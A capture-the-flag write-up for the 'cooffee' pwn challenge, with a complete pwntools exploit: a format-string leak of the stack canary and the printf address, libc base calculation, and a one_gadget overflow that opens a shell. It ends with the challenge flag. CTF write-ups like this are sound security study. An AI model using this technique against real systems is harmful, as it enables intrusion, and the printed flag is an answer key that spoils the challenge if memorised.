Description

It’s early morning, and the caffeine hasn’t quite kicked in yet. As you sip your cup of coffee, you notice something odd – a mysterious program named cooffee is running on your system.

Files : chall, libc-2.31.so

Preambule

The challenge is similary to the ftp-console, expect that printf address is leaked (instead of system) and stack canaries are enabled.

Analysing

A format string was found, that permit us to get stack canary.

Resolution

io = start()

io.sendlineafter(b"$ ", b"%9$p ")
r = io.recvline()
A = r.decode().strip().split(" ")
canary = int(A[0], 16)
leak = int(A[-1], 16)
libc.address = leak - libc.sym.printf
print(f"canary: {canary:#x}")
print(f"libc base: {libc.address:#x}")

one_gadget = libc.address + 0xe3b01
print(f"one_gadget: {one_gadget:#x}")

payload = b"A"*24 + p64(canary)*2 + p64(one_gadget)
io.sendafter(b"$ ", payload.ljust(0x50, b"A"))
io.interactive()

The flag was: CTF{b5d4efc30c05420acb161eb92e120a902187d9710b297fba36d42528ea4ae09d}